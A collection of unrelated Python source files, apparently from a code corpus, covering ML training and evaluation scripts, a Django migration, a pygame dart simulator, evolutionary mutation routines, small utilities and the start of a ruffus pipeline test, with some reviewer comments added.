    def preprocess(self, input_: Any, **preprocess_parameters: Dict) -> dict:
        """Turn raw input into the dict of model inputs."""
        raise NotImplementedError("preprocess not implemented")

    @abstractmethod
    def forward(self, **kwargs: Dict) -> dict:
        # NOTE(review): __call__ invokes self.forward(model_inputs_dict, ...) positionally,
        # so concrete overrides must accept a positional argument -- confirm subclass signatures
        raise NotImplementedError("forward not implemented")

    @abstractmethod
    def postprocess(self, **kwargs: Dict) -> dict:
        """Turn raw model outputs into the user-facing result dict."""
        raise NotImplementedError("postprocess not implemented")
|
python
|
# Generated by Django 3.1 on 2020-10-19 16:38
from django.db import migrations, models
class Migration(migrations.Migration):
    """Make restaurant ``business_number`` and ``open_time`` nullable."""

    dependencies = [
        ('shop', '0013_auto_20201020_0122'),
    ]

    operations = [
        # Allow restaurants without a registered business number
        migrations.AlterField(
            model_name='restaurant',
            name='business_number',
            field=models.CharField(max_length=30, null=True),
        ),
        # Allow restaurants without declared opening hours
        migrations.AlterField(
            model_name='restaurant',
            name='open_time',
            field=models.CharField(max_length=13, null=True),
        ),
    ]
|
python
|
from jax import numpy as jnp
from typing import Callable
def weighted_dot(sigma_i: float, sigma_r: float, sigma_b: float) -> Callable:
    """Defines weighed dot product, i.e. <u, v> with u = [i, j]

    Returns a closure computing ``sigma_i^2 * gram + sigma_r^2 * kernel + sigma_b^2``,
    with the squared weights fixed at creation time.
    """
    # Square the weights once; the closure reuses them on every call
    w_gram = sigma_i ** 2
    w_kernel = sigma_r ** 2
    bias = sigma_b ** 2

    def dot(gram: jnp.ndarray, kernel: jnp.ndarray) -> jnp.ndarray:
        return w_gram * gram + w_kernel * kernel + bias

    return dot
|
python
|
import requests,json
from HelperTools import Debug
import os
# Endpoint listing the source streams (unset or placeholder disables the feature)
sourceStreamInfoListUrl = os.getenv('SourceStream')
# Endpoint used to resolve non-fixed stream urls
GetNotFixedStreamAPIUrl = os.getenv("NotFixedStreamAPI")
# Source-stream info for the streams that need proxying
# (module-level cache, rebuilt by GetSourceStreamInfoList)
sourceStreamInfoList = {}
def GetSourceStreamInfoList():
    """Fetch the source streams to proxy and rebuild the module-level
    ``sourceStreamInfoList`` cache, keyed by stream url.

    Returns the cache dict, or None when the source url is not configured.
    """
    # Skip when the env var is unset or still holds the placeholder default
    # (fix: identity check `is None` instead of `== None`)
    if sourceStreamInfoListUrl is None or sourceStreamInfoListUrl == "default_source_stream_url":
        Debug.Log("SourceStream is null,so return GetSourceStreamInfoList")
        return
    # NOTE(review): no timeout or error handling -- a hung endpoint blocks here; confirm acceptable
    resultData = requests.get(sourceStreamInfoListUrl)
    resultJson = json.loads(resultData.text)
    # Rebuild in place so other modules holding a reference see the refresh
    sourceStreamInfoList.clear()
    for oneStream in resultJson:
        info = sourceStreamInfoList[oneStream["url"]] = {}
        info["bFixedUrl"] = bool(int(oneStream["FIXEDURL"]))
        info["url"] = oneStream["CAMERAINDEXCODE"]
    Debug.Log(f"GetSourceStreamInfoList:{sourceStreamInfoList}")
    return sourceStreamInfoList


# Populate the cache once at import time
GetSourceStreamInfoList()
def GetUnFixedUrl(UnFixedStreamUrl):
    """Resolve a non-fixed stream url through the NotFixedStream API.

    Returns the resolved url, or None when the API is not configured or the
    call does not report success.
    """
    # Skip when the env var is unset or still holds the placeholder default
    # (fix: identity check `is None` instead of `== None`)
    if GetNotFixedStreamAPIUrl is None or GetNotFixedStreamAPIUrl == "default_notfixed_stream_url":
        Debug.Log("NotFixedStreamAPI is null,so return GetUnFixedUrl")
        return None
    requestData = {
        "url": UnFixedStreamUrl
    }
    # NOTE(review): no timeout or error handling on the request -- confirm acceptable
    resultData = requests.get(GetNotFixedStreamAPIUrl, params=requestData)
    resultJson = json.loads(resultData.text)
    if int(resultJson["code"]) == 0 and resultJson["msg"] == "success":
        return resultJson["data"]["url"]
    # Explicitly signal failure instead of falling off the end implicitly
    return None
|
python
|
import pygame as p
import dartboard
import buttonPanel
import statPanel
from dartboard import PERCENTAGES, LASTBULLSEYE
# Window size in pixels and rendering settings
WIDTH = 800
HEIGHT = 700
BACKGROUND = p.Color("red")
MAX_FPS = 30  # frame-rate cap for the main loop
def main():
    """Run the dart simulator: set up the window, then loop handling
    start/stop/reset button clicks and throwing darts while active."""
    # `throwing` is shared with reset(), which also stops the simulation
    global throwing
    p.init()
    screen = p.display.set_mode((WIDTH, HEIGHT))
    screen.fill(BACKGROUND)
    p.display.set_caption("Dart Sim V. 1")
    clock = p.time.Clock()
    dartboard.draw(screen)
    buttons = buttonPanel.draw(screen)

    running = True
    throwing = False
    while running:
        for e in p.event.get():
            if e.type == p.QUIT:
                running = False
            if e.type == p.MOUSEBUTTONDOWN:
                if buttons[0].collidepoint(e.pos):  # start button
                    throwing = True
                    # Recolor the buttons to reflect the running state
                    p.draw.rect(screen, p.Color("light green"), buttons[0])
                    p.draw.rect(screen, p.Color("red"), buttons[1])
                    p.draw.rect(screen, p.Color("blue"), buttons[2])
                elif buttons[1].collidepoint(e.pos):  # stop button
                    throwing = False
                    p.draw.rect(screen, p.Color("green"), buttons[0])
                    p.draw.rect(screen, p.Color("tomato"), buttons[1])
                    p.draw.rect(screen, p.Color("blue"), buttons[2])
                elif buttons[2].collidepoint(e.pos):  # reset button
                    reset(screen)
                    p.draw.rect(screen, p.Color("green"), buttons[0])
                    p.draw.rect(screen, p.Color("red"), buttons[1])
                    p.draw.rect(screen, p.Color("cyan"), buttons[2])

        if throwing:
            # One random dart per frame while the simulation is running
            dartboard.throwDartRandomly(screen)
            statPanel.draw(screen)
            buttonPanel.draw(screen)

        p.display.flip()
        clock.tick(MAX_FPS)
def reset(screen):
    """Redraw a clean board and zero all scoring state for a new session."""
    global throwing  # add this to main()
    dartboard.draw(screen)
    throwing = False
    # Zero the counters kept as module-level state on dartboard.
    dartboard.NUM_DARTS = 0
    dartboard.LASTBULLSEYE = 0
    dartboard.PERCENTAGES = [0, 0, 0, 0, 0, 0]
    dartboard.SPOTS = [0, 0, 0, 0, 0, 0]  # reset count in all rings


main()
|
python
|
import copy
import inspect
import math
import numpy as np
import random
def create_new_children_through_cppn_mutation(pop, print_log, new_children=None, mutate_network_probs=None,
                                              max_mutation_attempts=1500):
    """Create copies, with modification, of existing individuals in the population.

    Parameters
    ----------
    pop : Population class
        This provides the individuals to mutate.
    print_log : PrintLog()
        For logging
    new_children : a list of new children created outside this function (may be empty)
        This is useful if creating new children through multiple functions, e.g. Crossover and Mutation.
    mutate_network_probs : probability, float between 0 and 1 (inclusive)
        The probability of mutating each network.
    max_mutation_attempts : int
        Maximum number of invalid mutation attempts to allow before giving up on mutating a particular individual.

    Returns
    -------
    new_children : list
        A list of new individual SoftBots.
    """
    if new_children is None:
        new_children = []

    random.shuffle(pop.individuals)

    while len(new_children) < pop.pop_size:
        for ind in pop:
            clone = copy.deepcopy(ind)

            # How many networks *must* be selected for mutation.
            if mutate_network_probs is None:
                required = 0
            else:
                required = mutate_network_probs.count(1)

            # Re-sample until at least `required` (and at least one, when
            # required == 0) unfrozen networks are selected.
            selection = []
            while np.sum(selection) <= required:
                if mutate_network_probs is None:
                    # uniformly select networks
                    selection = np.random.random(len(clone.genotype)) < 1 / float(len(clone.genotype))
                else:
                    # use probability distribution
                    selection = np.random.random(len(clone.genotype)) < mutate_network_probs

                # don't select any frozen networks (used to freeze aspects of genotype during evolution)
                for idx in range(len(selection)):
                    if clone.genotype[idx].freeze:
                        selection[idx] = False

            selected_networks = np.arange(len(clone.genotype))[selection].tolist()

            # Remember the parent's objective values for lineage tracking.
            for rank, goal in pop.objective_dict.items():
                setattr(clone, "parent_{}".format(goal["name"]), getattr(clone, goal["name"]))

            clone.parent_genotype = ind.genotype
            clone.parent_id = clone.id

            # Snapshot the phenotype state so neutral mutations can be detected.
            for name, details in clone.genotype.to_phenotype_mapping.items():
                details["old_state"] = copy.deepcopy(details["state"])

            for selected_net_idx in selected_networks:

                mutation_counter = 0
                done = False
                while not done:
                    mutation_counter += 1
                    candidate = copy.deepcopy(clone)

                    # perform mutation(s)
                    for _ in range(candidate.genotype[selected_net_idx].num_consecutive_mutations):
                        if not clone.genotype[selected_net_idx].direct_encoding:
                            # using CPPNs
                            # FIX: inspect.getargspec was removed in Python 3.11;
                            # getfullargspec exposes the same .args attribute.
                            mut_func_args = inspect.getfullargspec(candidate.genotype[selected_net_idx].mutate)
                            mut_func_args = [0 for _ in range(1, len(mut_func_args.args))]
                            # Flip exactly one mutation-type flag on at random.
                            choice = random.choice(range(len(mut_func_args)))
                            mut_func_args[choice] = 1
                            variation_type, variation_degree = candidate.genotype[selected_net_idx].mutate(*mut_func_args)
                        else:
                            # direct encoding with possibility of evolving mutation rate
                            # TODO: enable cppn mutation rate evolution
                            rate = None
                            for net in clone.genotype:
                                if "mutation_rate" in net.output_node_names:
                                    rate = net.values  # evolved mutation rates, one for each voxel

                            if "mutation_rate" not in candidate.genotype[selected_net_idx].output_node_names:
                                # use evolved mutation rates
                                variation_type, variation_degree = candidate.genotype[selected_net_idx].mutate(rate)
                            else:
                                # this is the mutation rate itself (use predefined meta-mutation rate)
                                variation_type, variation_degree = candidate.genotype[selected_net_idx].mutate()

                    if variation_degree != "":
                        candidate.variation_type = "{0}({1})".format(variation_type, variation_degree)
                    else:
                        candidate.variation_type = str(variation_type)
                    candidate.genotype.express()

                    if candidate.genotype[selected_net_idx].allow_neutral_mutations:
                        done = True
                        clone = copy.deepcopy(candidate)  # SAM: ensures change is made to every net
                        break
                    else:
                        # Only accept the mutation if it actually changed the
                        # phenotype AND the result is a valid individual.
                        for name, details in candidate.genotype.to_phenotype_mapping.items():
                            new = details["state"]
                            old = details["old_state"]
                            # FIX: np.bool alias was removed in NumPy 1.24;
                            # the builtin bool is the documented replacement.
                            changes = np.array(new != old, dtype=bool)
                            if np.any(changes) and candidate.phenotype.is_valid():
                                done = True
                                clone = copy.deepcopy(candidate)  # SAM: ensures change is made to every net
                                break

                    if mutation_counter > max_mutation_attempts:
                        print_log.message("Couldn't find a successful mutation in {} attempts! "
                                          "Skipping this network.".format(max_mutation_attempts))
                        num_edges = len(clone.genotype[selected_net_idx].graph.edges())
                        num_nodes = len(clone.genotype[selected_net_idx].graph.nodes())
                        print_log.message("num edges: {0}; num nodes {1}".format(num_edges, num_nodes))
                        break

                # end while

                if not clone.genotype[selected_net_idx].direct_encoding:
                    # NOTE(review): graph.node is the pre-2.4 networkx API
                    # (graph.nodes in newer versions) — confirm the pinned version.
                    for output_node in clone.genotype[selected_net_idx].output_node_names:
                        clone.genotype[selected_net_idx].graph.node[output_node]["old_state"] = ""

            # reset all objectives we calculate in VoxCad to unevaluated values
            for rank, goal in pop.objective_dict.items():
                if goal["tag"] is not None:
                    setattr(clone, goal["name"], goal["worst_value"])

            clone.id = pop.max_id
            pop.max_id += 1
            new_children.append(clone)

    return new_children
def mutate_controllers(pop, children, crossover_rate=0.4):
    """Crossover controller parameters between random parents for a fraction
    of the children, then mutate every child's controller.

    NOTE(review): the loop iterates child_contr.__dict__ but reads/writes via
    subscripting (child_contr[attr]) — this only works if the controller class
    implements __getitem__/__setitem__; confirm, otherwise getattr/setattr is
    needed.
    """
    # controllers crossover
    random.shuffle(children)
    for i in range(0, int(math.floor(crossover_rate*pop.pop_size))):
        # Two distinct random parents per crossover child.
        indices = random.sample(range(len(pop)), 2)
        contr_1 = pop[indices[0]].genotype.controller
        contr_2 = pop[indices[1]].genotype.controller
        child_contr = children[i].genotype.controller
        for attr in child_contr.__dict__.keys():
            # Child parameter becomes the parents' arithmetic mean.
            child_contr[attr] = (contr_1[attr]+contr_2[attr])/2
    random.shuffle(children)
    for child in children:
        child.genotype.controller.mutate()
    return children
def mutate_new_materials(pop, children, crossover_rate=0.4):
    """Average material properties of two random parents into a fraction of
    the children, then mutate every child's materials.

    Material "9" is treated specially: it is kept as the counterphase copy of
    material "8" (same stiffness and density, negated cte) instead of
    mutating independently.
    """
    # new materials crossover
    random.shuffle(children)
    for i in range(0, int(math.floor(crossover_rate * pop.pop_size))):
        # Two distinct random parents per crossover child.
        indices = random.sample(range(len(pop)), 2)
        new_materials_1 = pop[indices[0]].genotype.materials
        new_materials_2 = pop[indices[1]].genotype.materials
        child_new_materials = children[i].genotype.materials
        for material_idx in child_new_materials.keys():
            # Each property becomes the parents' arithmetic mean.
            child_new_materials[material_idx].young_modulus = (new_materials_1.get(
                material_idx).young_modulus + new_materials_2.get(material_idx).young_modulus) / 2
            child_new_materials[material_idx].density = (new_materials_1.get(
                material_idx).density + new_materials_2.get(material_idx).density) / 2
            child_new_materials[material_idx].cte = (new_materials_1.get(
                material_idx).cte + new_materials_2.get(material_idx).cte) / 2
    random.shuffle(children)
    for child in children:
        for material_idx in child.genotype.materials.keys():
            if material_idx == "9":
                # counterphase actuation
                child.genotype.materials[material_idx].young_modulus = child.genotype.materials["8"].young_modulus
                child.genotype.materials[material_idx].density = child.genotype.materials["8"].density
                child.genotype.materials[material_idx].cte = -child.genotype.materials["8"].cte
            else:
                child.genotype.materials[material_idx].mutate()
    return children
def create_new_children(pop, print_log):
    """Create copies, with modification, of existing individuals in the population.

    Parameters
    ----------
    pop : Population class
        This provides the individuals to mutate.
    print_log : PrintLog()
        For logging
    """
    children = create_new_children_through_cppn_mutation(pop, print_log)
    # Dispatch on which optional genotype components are present.
    genotype = pop[0].genotype
    if hasattr(genotype, "controller"):
        return mutate_controllers(pop, children)
    if hasattr(genotype, "materials"):
        return mutate_new_materials(pop, children)
    return children
def genome_wide_mutation(pop, print_log):
    """Mutate every network of every individual: probability 1 per network."""
    all_networks = [1] * len(pop[0].genotype)
    return create_new_children_through_cppn_mutation(pop, print_log,
                                                     mutate_network_probs=all_networks)
|
python
|
import sys
def solution(A):
    """Return the minimal absolute difference between the sums of the two
    parts A[0..P-1] and A[P..N-1], over every split point P (1 <= P < N)."""
    best = sys.maxsize
    left_sum = 0
    right_sum = sum(A)
    # Slide the split point left-to-right, updating both partial sums in O(1).
    for value in A[:-1]:
        left_sum += value
        right_sum -= value
        diff = abs(right_sum - left_sum)
        if diff < best:
            best = diff
    return best
def test_solution():
    """Unit tests for solution(): minimal tape-split difference."""
    assert solution([3, 1, 2, 4, 3]) == 1
    # Smallest valid input — exactly one split point.
    assert solution([1, 2]) == 1
    # Negative values are handled via abs().
    assert solution([-1000, 1000]) == 2000
|
python
|
import json
def readJsonFromFile(filename):
    """Read a file and parse its entire contents as JSON.

    :param filename: path of the file to read.
    :return: the parsed JSON value (dict, list, str, number, ...).
    :raises OSError: if the file cannot be opened.
    :raises json.JSONDecodeError: if the contents are not valid JSON.
    """
    # "with" guarantees the handle is closed even when parsing raises,
    # unlike the previous open()/read()/close() sequence which leaked the
    # file object on a decode error.
    with open(filename, 'r') as file:
        return json.load(file)
|
python
|
from enum import Enum
class TaskState(Enum):
    """Lifecycle states for a task."""

    # static states: a task can either succeed or fail
    VALID = 0
    INVALID = 1
    # actionable states
    DROP = 16
    DONE = 153
class TaskConfigState(Enum):
    """Validation outcome for a task's configuration."""

    VALID = 0
    INVALID = 1
|
python
|
import os
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
# Download/cache MNIST and expose it with one-hot encoded labels.
mnist = input_data.read_data_sets('/tmp/data', one_hot=True)
# Path to Computation graphs
LOGDIR = './graphs'
# Start session
sess = tf.Session()
# Hyper parameters
LEARNING_RATE = 0.01
BATCH_SIZE = 1000
EPOCHS = 10
# Hidden Layers
HL_1 = 1000
HL_2 = 500
# Other parameters
INPUT_SIZE = 28 * 28  # MNIST images are 28x28 pixels, flattened
N_CLASSES = 10  # digits 0-9
with tf.name_scope('input'):
    # Batch placeholders: flattened images and one-hot labels.
    images = tf.placeholder(tf.float32, [None, INPUT_SIZE], name="images")
    labels = tf.placeholder(tf.float32, [None, N_CLASSES], name="labels")
def fc_layer(x, layer, size_out, activation=None):
    """Fully-connected layer: activation(x @ W + b) inside its own name scope.

    x: 2-D input tensor (batch, size_in); layer: name-scope string;
    size_out: number of output units; activation: optional op (e.g. tf.nn.relu).
    Returns the pre-activation tensor when activation is None.
    """
    with tf.name_scope(layer):
        size_in = int(x.shape[1])
        W = tf.Variable(tf.random_normal([size_in, size_out]), name="weights")
        # NOTE(review): biases are initialised to -1, which is unusual
        # (0 or a small positive constant is typical) — confirm intent.
        b = tf.Variable(tf.constant(-1, dtype=tf.float32, shape=[size_out]), name="biases")
        wx_plus_b = tf.add( tf.matmul(x, W), b)
        if activation:
            return activation(wx_plus_b)
        return wx_plus_b
# Network: 784 -> 1000 (relu) -> 500 (relu) -> dropout -> 10 logits.
fc_1 = fc_layer(images, 'fc_1', HL_1, tf.nn.relu)
fc_2 = fc_layer(fc_1, 'fc_2', HL_2, tf.nn.relu)
#to prevent overfitting
dropped = tf.nn.dropout(fc_2, keep_prob=0.9)
# output layer
y = fc_layer(dropped, 'output', N_CLASSES)
with tf.name_scope('loss'):
    loss = tf.reduce_mean( tf.nn.softmax_cross_entropy_with_logits(logits=y, labels=labels))
    tf.summary.scalar('loss', loss)
with tf.name_scope('optimizer'):
    train = tf.train.AdamOptimizer(LEARNING_RATE).minimize(loss)
with tf.name_scope('evaluation'):
    # Fraction of samples whose argmax prediction matches the label.
    correct = tf.equal( tf.argmax(y, 1 ), tf.argmax(labels, 1))
    accuracy = tf.reduce_mean( tf.cast(correct, dtype=tf.float32))
    tf.summary.scalar('accuracy', accuracy)
# Separate writers so train/test curves can be compared in TensorBoard.
train_writer = tf.summary.FileWriter(os.path.join(LOGDIR, "train"), sess.graph)
test_writer = tf.summary.FileWriter(os.path.join(LOGDIR, "test"), sess.graph)
summary_op = tf.summary.merge_all()
init = tf.global_variables_initializer()
sess.run(init)
with tf.name_scope('training'):
    step = 0
    for epoch in range(EPOCHS):
        print("epoch ", epoch, "\n-----------\n")
        for batch in range(int(mnist.train.labels.shape[0]/BATCH_SIZE)):
            step += 1
            batch_xs, batch_ys = mnist.train.next_batch(BATCH_SIZE)
            summary_result, _ = sess.run( [summary_op, train], feed_dict={images: batch_xs, labels: batch_ys} )
            train_writer.add_summary(summary_result, step)
            # NOTE(review): evaluating on the full test set after every batch
            # is expensive — once per epoch is more common; confirm intent.
            summary_result, acc = sess.run( [summary_op, accuracy], feed_dict={images: mnist.test.images, labels: mnist.test.labels} )
            test_writer.add_summary(summary_result, step)
            print("Batch ", batch, ": accuracy = ", acc)
train_writer.close()
test_writer.close()
sess.close()
|
python
|
#:::::::::::::::::::::::::
#::
#:: ProjectDependencies/check.py
#::_______________________
#::
#:: Author: Clement BERTHAUD
#::
#:: MIT License
#:: Copyright (c) 2018 ProjectDependencies - Clément BERTHAUD
#::
#:: Permission is hereby granted, free of charge, to any person obtaining a copy
#:: of this software and associated documentation files (the "Software"), to deal
#:: in the Software without restriction, including without limitation the rights
#:: to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#:: copies of the Software, and to permit persons to whom the Software is
#:: furnished to do so, subject to the following conditions:
#::
#:: The above copyright notice and this permission notice shall be included in all
#:: copies or substantial portions of the Software.
#::
#:: THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#:: IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#:: FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#:: AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#:: LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#:: OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
#:: SOFTWARE.
#::
#:::::::::::::::::::::::::
import os
import ProjectDependencies.utils
from colorama import Fore, Back, Style
from colorama import init as init_colorama
init_colorama()
def command( iArgs, iFiles, iConfig, iDirs, iKeys ):
    """Check the index against the working tree and report missing indexed files."""
    utils = ProjectDependencies.utils
    utils.notify_ignore_args( iArgs )
    utils.smart_gather_wtree_resolve_all_hash_inconsistencies( iDirs, iFiles )
    indexed_entries = utils.gather_list_with_hash( iFiles["index"] )
    # Collect every indexed entry whose file is absent from the working directory.
    missing_entries = [ entry for entry in indexed_entries
                        if not os.path.exists( iDirs["root"] + entry["file"] ) ]
    if not missing_entries:
        print( "Everything's fine, chill out." )
        return
    print( "Yeah, you should run download again." )
    print( "Here is the list of missing indexed files:" )
    print( Fore.RED )
    for entry in missing_entries:
        print( ProjectDependencies.utils.make_offset( 4 ) + "missing: " + entry["file"] )
    print(Style.RESET_ALL)
|
python
|
"""
We presume that Channels is operating over a Redis channel_layer here, and use it
explicitly.
"""
from base64 import b64encode
from json import dumps
def message_to_hash(message):
    """Build the redis key for *message*: b"semaphore:" + base64(JSON(message))."""
    serialized = dumps(message).encode("utf-8")
    return b"semaphore:" + b64encode(serialized)
async def get_set_message_semaphore(channel_layer, message):
    """Set a semaphore in redis.

    Used to prevent sending the same message twice within 2 seconds.
    Returns a truthy value only when the semaphore was newly set (the key
    did not already exist).
    """
    msg_hash = message_to_hash(message)
    async with channel_layer.connection(0) as connection:
        # expire=2 / exist="SET_IF_NOT_EXIST" — presumably the aioredis SET
        # signature (NX semantics with a 2 s TTL); confirm against the
        # installed redis client version.
        return await connection.set(msg_hash, 1, expire=2, exist="SET_IF_NOT_EXIST")
async def clear_message_semaphore(channel_layer, message):
    """Delete the semaphore key for *message* so an identical message may be
    sent again before its TTL would have expired."""
    msg_hash = message_to_hash(message)
    async with channel_layer.connection(0) as connection:
        return await connection.delete(msg_hash)
|
python
|
"""
Configuration for the integration issues tests
"""
import pytest
@pytest.fixture(scope="package", autouse=True)
def xfail():
    # Auto-applied to every test in this package: mark all issue tests as
    # expected failures until the suite is refactored.
    pytest.xfail("Issues tests need refactored")
|
python
|
import argparse
import json
import logging
import os
import subprocess
import tqdm
import wget
from collections import defaultdict
from datetime import datetime
from pathlib import Path
import numpy as np
import torch
import random
def extracting_log_info(log_files, experiment, logging):
    """Aggregate t2v/v2t retrieval metrics across the given eval log files
    (one per seed) and log/write "mean, std" (ddof=1) per metric."""
    metrics_t2v = defaultdict(list)
    metrics_v2t = defaultdict(list)
    for file_name in log_files:
        # NOTE(review): output_string is re-initialised on every iteration;
        # only the last reset matters since it is extended after the loop.
        output_string = f"{experiment}:\n"
        with open(Path("logs_eval") / file_name, 'r') as f:
            content_lines = f.read().splitlines()
            # Only the last 14 lines hold the final metric report.
            content_lines = content_lines[-14:]
            for line in content_lines:
                if 't2v' in line:
                    metric_entry = line.split('test_t2v_metrics_')[1].split(':')[0]
                    metrics_t2v[metric_entry].append(float(line.split('test_t2v_metrics_')[1].split(':')[1]))
                elif 'v2t' in line:
                    metric_entry = line.split('test_v2t_metrics_')[1].split(':')[0]
                    metrics_v2t[metric_entry].append(float(line.split('test_v2t_metrics_')[1].split(':')[1]))
    keys = list(metrics_t2v.keys())
    for key in keys:
        output_string += f"{key}_t2v: {np.mean(metrics_t2v[key]):.1f}, {np.std(metrics_t2v[key], ddof=1):.1f}\n"
    for key in keys:
        output_string += f"{key}_v2t: {np.mean(metrics_v2t[key]):.1f}, {np.std(metrics_v2t[key], ddof=1):.1f}\n"
    logging.info(output_string)
    with open(Path("logs_eval") / f"{experiment}_summary.txt", 'w') as f:
        f.write(output_string)
def run_exp(experiments, logging):
    """Evaluate every configured experiment, one after another."""
    for experiment in experiments:
        logging.info(f"Now running {experiment}")
        run_one_exp(experiment, experiments, logging)
def download_configs(experiment, trained_model_path, group_id, seed, timestamp):
    """Download the config.json for one (experiment, group, seed, timestamp)
    next to its model checkpoint and patch its seed field."""
    # The config lives in the same folder as trained_model.pth.
    new_folder = str(trained_model_path).split('/trained_model.pth')[0]
    url_config = f"http://www.robots.ox.ac.uk/~vgg/research/collaborative-experts/data/models/{experiment}/{group_id}/{seed}/{timestamp}/config.json"
    config_path = Path(new_folder) / 'config.json'
    wget.download(url_config, out=str(config_path))
    with open(config_path, 'r') as f:
        config_content = json.load(f)
    # The seed string presumably ends in a digit (e.g. "seed_1") — the last
    # character becomes the numeric seed; confirm for multi-digit seeds.
    config_content['seed'] = int(seed[-1])
    with open(config_path, 'w') as f:
        json.dump(config_content, f)
def download_models(experiment, logging, trained_model_path,
                    group_id, seed, timestamp):
    """Ensure the trained model checkpoint and its config exist locally,
    downloading either from the public server when missing."""
    new_folder = str(trained_model_path).split('/trained_model.pth')[0]
    if os.path.exists(trained_model_path) is False:
        logging.info(f"Downloading model for {seed} since it does not exist on the local machine")
        url = f"http://www.robots.ox.ac.uk/~vgg/research/collaborative-experts/data/models/{experiment}/{group_id}/{seed}/{timestamp}/trained_model.pth"
        # import pdb; pdb.set_trace()
        Path(new_folder).mkdir(exist_ok=True, parents=True)
        wget.download(url, out=str(trained_model_path))
    else:
        logging.info(f"Model already downloaded for {experiment} seed {seed}")
    if os.path.exists(Path(new_folder) / 'config.json') is False:
        download_configs(experiment, trained_model_path, group_id, seed, timestamp)
    else:
        logging.info(f"Config already downloaded for {experiment} seed {seed}")
def run_one_exp(experiment, experiments, logging):
    """Download model/config for every (group_id, seed, timestamp) entry of
    one experiment, run test.py on each, then average the logged metrics."""
    # NOTE(review): this initial group_id is immediately shadowed by the
    # loop unpacking below — looks dead; confirm before removing.
    group_id = experiments[experiment][0]
    with open('exp_to_seed_time.json', 'r') as f:
        json_dict = json.load(f)
    log_files = []
    for (group_id, seed, timestamp) in json_dict[experiment]:
        group_id_path = Path("data/saved/models") / experiment / group_id
        logging.info("Running evaluation on existent seeds")
        (Path("logs_eval")).mkdir(exist_ok=True, parents=True)
        trained_model_path = group_id_path / seed / timestamp / 'trained_model.pth'
        download_models(experiment, logging, trained_model_path,
                        group_id, seed, timestamp)
        config_path = group_id_path / seed / timestamp / 'config.json'
        # NOTE(review): ">&1" is effectively a no-op redirect — "2>&1"
        # (capture stderr into the tee'd log) was probably intended; confirm.
        cmd = f"python test.py --config {config_path} --resume {trained_model_path} --device 0 --eval_from_training_config >&1 | tee logs_eval/log_{group_id}_{seed}.txt"
        log_files.append(f"log_{group_id}_{seed}.txt")
        logging.info(cmd)
        subprocess.call(cmd, shell=True)
    logging.info("Now averaging results")
    extracting_log_info(log_files, experiment, logging)
def main():
    """CLI entry point: parse arguments, configure file + console logging,
    load the experiment registry and evaluate one or all experiments."""
    parser = argparse.ArgumentParser()
    parser.add_argument("--experiments_path", default="misc/experiments-audiocaps.json")
    parser.add_argument("--experiment", type=str, default=None)
    parser.add_argument(
        "--data_dir",
        type=Path,
        default="data",
    )
    parser.add_argument(
        "--dataset",
        type=str,
        default="data",
    )
    parser.add_argument(
        "--refresh",
        action="store_true",
    )
    args = parser.parse_args()
    os.makedirs('logs', exist_ok=True)
    # Log to a timestamped file and mirror everything to the console.
    logging.basicConfig(filename=f"logs/{datetime.now().strftime(r'%m%d_%H%M%S')}.log",
                        level=logging.INFO)
    logging.getLogger().addHandler(logging.StreamHandler())
    logging.info(args)
    with open(args.experiments_path, "r") as f:
        experiments = json.load(f)
    # No --experiment given: run the whole registry.
    if args.experiment is None:
        run_exp(experiments, logging)
    else:
        run_one_exp(args.experiment, experiments, logging)


if __name__ == "__main__":
    main()
|
python
|
#!/usr/bin/env python
from __future__ import print_function
"""
test_split_regex_and_collate.py
"""
JOBS_PER_TASK = 5
import os
tempdir = os.path.relpath(os.path.abspath(os.path.splitext(__file__)[0])) + "/"
import sys
import re
# add grandparent to search path for testing
grandparent_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), "..", ".."))
sys.path.insert(0, grandparent_dir)
# module name = script name without extension
module_name = os.path.splitext(os.path.basename(__file__))[0]
# funky code to import by file name
parent_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), ".."))
import ruffus
from ruffus import pipeline_run, pipeline_printout, Pipeline, suffix, regex, formatter, originate, follows, merge, mkdir, posttask, subdivide, transform, collate, split
from ruffus.ruffus_exceptions import RethrownJobError
from ruffus.ruffus_utility import RUFFUS_HISTORY_FILE, CHECKSUM_FILE_TIMESTAMPS
from ruffus.combinatorics import *
#88888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
# options
#88888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
try:
from StringIO import StringIO
except:
from io import StringIO
import shutil
import unittest
#88888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
# imports
#88888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
# use simplejson in place of json for python < 2.6
try:
import json
except ImportError:
import simplejson
json = simplejson
#88888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
# Main logic
#88888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
#
# Three starting files
#
original_files = [tempdir + "/original_%d.fa" % d for d in range(3)]
#88888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
# Tasks
#88888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
@mkdir(tempdir)
@originate(original_files)
def generate_initial_files(out_name):
    # Create each starting fasta file as an empty placeholder.
    with open(out_name, 'w') as outfile:
        pass
#
# split_fasta_file
#
@posttask(lambda: sys.stderr.write("\tSplit into %d files each\n" % JOBS_PER_TASK))
@subdivide(generate_initial_files,
           regex(r".*\/original_(\d+).fa"),         # match original files
           [tempdir + r"/files.split.\1.success",   # flag file for each original file
            tempdir + r"/files.split.\1.*.fa"],     # glob pattern
           r"\1")                                   # index of original file
def split_fasta_file (input_file, outputs, original_index):
    """Simulate splitting one fasta file into JOBS_PER_TASK pieces plus a
    success-flag file; stale pieces from a previous run are removed first."""
    #
    #   remove previous fasta files
    #
    success_flag = outputs[0]
    output_file_names = outputs[1:]
    for f in output_file_names:
        os.unlink(f)
    #
    #   create as many files as we are simulating in JOBS_PER_TASK
    #
    for i in range(JOBS_PER_TASK):
